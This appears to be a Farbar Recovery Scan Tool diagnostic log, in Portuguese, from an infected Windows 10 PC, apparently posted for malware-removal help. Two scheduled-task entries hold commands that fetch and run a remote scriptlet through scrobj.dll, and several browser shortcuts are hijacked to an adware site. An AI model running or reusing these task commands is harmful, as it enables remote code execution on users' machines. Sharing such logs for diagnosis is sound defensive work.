FirewallRules: [UDP Query User{709BF627-EF6A-467F-BB8C-A3B16799011C}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [TCP Query User{ADD77E72-73A3-405B-8538-E42E851BC523}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [UDP Query User{46F5DF35-2F20-404C-A8BC-4103C1998C17}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [{9F229D1E-C3B6-4003-AA4C-8F8DA6A24279}] => (Allow) C:\Program Files (x86)\Opera\43.0.2442.1144\opera.exe
FirewallRules: [{40AB0920-B4FE-4491-A51E-EBDA58313C0A}] => (Allow) C:\Program Files (x86)\Opera\44.0.2510.857\opera.exe
FirewallRules: [{2EB8D542-998D-4212-B6BD-95A24A9F6172}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{850DCA74-5BBB-4944-A87D-0A8D7E1D5AFB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{0F38ED4F-1549-4D0C-B7A9-2D31A9DD575A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{7C0CCBA7-2D84-47CA-B418-F4D4B5EADEF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Pontos de Restauração =========================
01-04-2017 13:58:49 Ponto de Verificação Agendado
11-04-2017 03:58:15 Ponto de Verificação Agendado
19-04-2017 15:00:17 Ponto de Verificação Agendado
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Mouse compatível com PS/2
Description: Mouse compatível com PS/2
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Teclado Padrão PS/2
Description: Teclado Padrão PS/2
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (teclados padrões)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/19/2017 03:00:30 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (04/19/2017 11:57:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADMINISTRADOR)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/18/2017 08:44:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADMINISTRADOR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/18/2017 12:30:53 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/18/2017 08:07:57 AM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/16/2017 05:06:36 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (04/15/2017 06:31:17 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/14/2017 10:20:56 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/13/2017 06:40:08 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (04/13/2017 03:56:43 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Erros de Sistema:
=============
Error: (04/21/2017 02:04:26 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/21/2017 01:59:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/19/2017 10:45:13 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/19/2017 10:45:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/19/2017 11:57:12 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/19/2017 11:56:58 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/18/2017 08:05:28 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/18/2017 08:05:13 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/17/2017 10:12:06 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/17/2017 10:03:09 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM)2 Duo CPU E7500 @ 2.93GHz
Percentagem de memória em uso: 60%
RAM física total: 2009.33 MB
RAM física disponível: 803.11 MB
Virtual Total: 4057.33 MB
Virtual disponível: 2544.07 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:397.08 GB) (Free:46.99 GB) NTFS
Drive e: (Seagate Expansion Drive) (Fixed) (Total:931.51 GB) (Free:608.62 GB) NTFS
Drive f: (MULTIBOOT) (Removable) (Total:7.44 GB) (Free:6.37 GB) FAT32
Drive g: () (Removable) (Total:1.86 GB) (Free:1.86 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 4A5A8254)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=397.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=68.1 GB) - (Type=05)
Partition 4: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 5ED0A206)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 3 (Size: 1.9 GB) (Disk ID: 20736F63)
No partition Table on disk 3.
==================== Fim de Addition.txt ============================
Executado por Hakaz7 (2017-04-21 14:23:48)
Executando a partir de C:\Users\Hakaz7\Desktop
Windows 10 Pro (X64) (2016-09-15 15:44:03)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1487806579-2887001220-3690848270-500 - Administrator - Disabled)
aldem (S-1-5-21-1487806579-2887001220-3690848270-1003 - Limited - Enabled) => C:\Users\aldem
Convidado (S-1-5-21-1487806579-2887001220-3690848270-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1487806579-2887001220-3690848270-503 - Limited - Disabled)
Hakaz7 (S-1-5-21-1487806579-2887001220-3690848270-1000 - Administrator - Enabled) => C:\Users\Hakaz7
HomeGroupUser$ (S-1-5-21-1487806579-2887001220-3690848270-1002 - Limited - Enabled)
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
AIMP Classic (HKLM-x32\...\AIMPClassic) (Version: - )
ComicRack v0.9.176 (HKLM\...\ComicRack) (Version: v0.9.176 - cYo Soft)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DriversCloud.com (64 bits) (HKLM\...\{A156B6AA-A988-4BE4-8377-FE0D310FB49F}) (Version: 10.0.1.0 - Cybelsoft)
EagleGet version 2.0.4.19 (HKLM-x32\...\{F6D8142A-B30B-454B-9EE0-08A7B997DFE4}_is1) (Version: 2.0.4.19 - EagleGet)
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
Intel(R) Network Connections 15.2.89.2 (HKLM\...\PROSetDX) (Version: 15.2.89.2 - Intel)
K-Lite Mega Codec Pack 11.3.6 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.3.6 - )
Malwarebytes Anti-Malware versão 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 41.0.2 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 pt-BR)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0a1 - Mozilla)
MPC-HC 1.7.8 (HKLM-x32\...\{2624B969-7135-4EB1-B0F6-2D8C397B45F7}_is1) (Version: 1.7.8 - MPC-HC Team)
Nightly 43.0a1 (x64 en-US) (HKLM\...\Nightly 43.0a1 (x64 en-US)) (Version: 43.0a1 - Mozilla)
Opera Stable 44.0.2510.857 (HKLM-x32\...\Opera 44.0.2510.857) (Version: 44.0.2510.857 - Opera Software)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Private Internet Access Support Files (HKLM-x32\...\{7D72DAFF-DCB2-437B-BC22-4B2ABF21462B}) (Version: 1.0.0.0 - Private Internet Access)
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 2.45.0.0 - Goversoft LLC)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Spotify (HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
VDownloader Plus 4.2.1820 (HKLM\...\VDownloader Plus_is1) (Version: 4.2.1820 - )
Watchtower Library 2015 - Português (HKLM-x32\...\{C0581871-09A0-4AE4-B4C2-188E2A8AD5FA}) (Version: 17.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-1487806579-2887001220-3690848270-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\FileCoAuth.exe (Microsoft Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {026A821F-8398-4C7A-9415-F1690D2011A1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03AC74DB-BBD3-4F7F-B391-CEEBA99F502B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {097B0595-F663-42BB-AABC-CAFCFD985BCD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-27] (Google Inc.)
Task: {12B98FC6-062C-44B6-8433-7E5116B5BD8B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {1338BBB9-402D-41A9-9C9A-AB16163A54A5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {16A03400-EF94-475D-B197-C3A2E5701AED} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {306E14B8-D507-4D63-8B23-196C023D30D9} - System32\Tasks\Private Internet Access Startup => C:\Program Files\pia_manager\pia_manager.exe [2016-03-23] ()
Task: {308FDFF4-A13B-40ED-A83A-85CBEB81D670} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-27] (Google Inc.)
Task: {31F918BF-866D-4E0F-9CBF-2F387EB41B76} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {3230F5D5-3995-495C-82DC-802F3F297A64} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {378DEEE5-F320-41D1-927B-6F59CF5AE046} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {465E36D4-665C-4FBE-95FA-10E1A9683415} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2017-03-04] (Microsoft Corporation)
Task: {4AAAC00F-A704-48E4-83D4-10ECBAF2D2B1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {5C1E0603-BE9E-4BB8-9E17-2954C62AAA1E} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {67F0F594-BEDE-4499-AC0E-50C915D3E177} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6AD72B4B-85F1-4373-AC2D-654F1819B128} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6E9ADB02-B6DD-447E-B236-03F568A16191} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {6EBF8F81-1309-42DB-93AE-4A50DDD3C93C} - System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition => C:\Windows\system32\UpgradeSubscription.exe [2016-07-16] (Microsoft Corporation)
Task: {71ABB2F6-A74E-4CFB-BABB-D4670F8502F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {741881B2-CD8A-4512-8FAF-AC79A3CBD08E} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {79AF35CC-C4E4-405A-A612-9186E80E1C2C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {7A55049D-73DA-49EB-9656-4164E4B22FF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {84664C42-883A-4732-B22C-4A4EF94A0B2E} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {87876F0F-1362-41DF-A592-B647859387D6} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {89598D0D-BB1A-4B6E-BA0B-7F3ECC62C907} - System32\Tasks\Opera scheduled Autoupdate 1442452640 => C:\Program Files (x86)\Opera\launcher.exe [2017-03-21] (Opera Software)
Task: {8E567375-3AE8-42FF-ADAA-221461010F91} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {97428D03-ED99-4498-8F49-B1F92A687F20} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {A50FD54C-E34C-4E67-8401-334865E44CD3} - System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition => C:\Windows\system32\UpgradeSubscription.exe [2016-07-16] (Microsoft Corporation)
Task: {A9477F8C-3789-465D-9B1A-4B47F22D2876} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {ACEF1173-7D8B-4AB2-BB19-92543F6550B9} - System32\Tasks\Windows-WoShiBeiYongDe => /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81FTU3N8M5F8U5RkZYNjwxOUNQN8QQNjM8RjZQF8ZSNc== scrobj.dll
Task: {AE33619B-9CDE-4B51-8BE2-3EA49B792A25} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-08-05] (Microsoft Corporation)
Task: {BDA5345D-59D9-426F-A204-CDD8C51D0D00} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {C55F630C-52AF-4D43-9B56-E4286F8FAB2B} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {C584DED3-BD55-415E-B98E-7948FD354614} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {CE3156B4-617E-4A69-A706-4CFEE6C18A9A} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [2016-01-31] (Goversoft LLC)
Task: {CEDEA982-B649-44DA-AB68-EFEF9A463CAF} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D7363947-96AE-4959-8D5B-F7DB49B01864} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {E74ADD65-BA9B-49CD-95FC-2AC7D03291C4} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECD7BE54-F1F9-4EF8-8628-6DA7A95F4787} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {EDCD98EF-3CE4-4259-8BF3-D5F8350ED7C7} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-04-12] (Microsoft Corporation)
Task: {F17E6DC9-7789-4F4D-87BA-44E3B145FF27} - System32\Tasks\PowerWord-SCT-JT => /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81FTU3N8M5F8U5RkZYNjwxOUNQN8QQNjM8RjZQF8ZSNc== scrobj.dll
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
Shortcut: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
==================== Módulos Carregados (Whitelisted) ==============
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 14:17 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2011-06-15 04:57 - 2011-06-15 04:57 - 00034304 _____ () C:\WINDOWS\System32\ssb6mlm.dll
2017-04-12 14:17 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-15 12:51 - 2016-09-15 12:51 - 00959168 _____ () C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\amd64\ClientTelemetry.dll
2016-01-31 13:17 - 2016-01-31 13:17 - 03525431 _____ () C:\Program Files (x86)\PrivaZer\PrivaMenu5.dll
2016-09-15 22:48 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
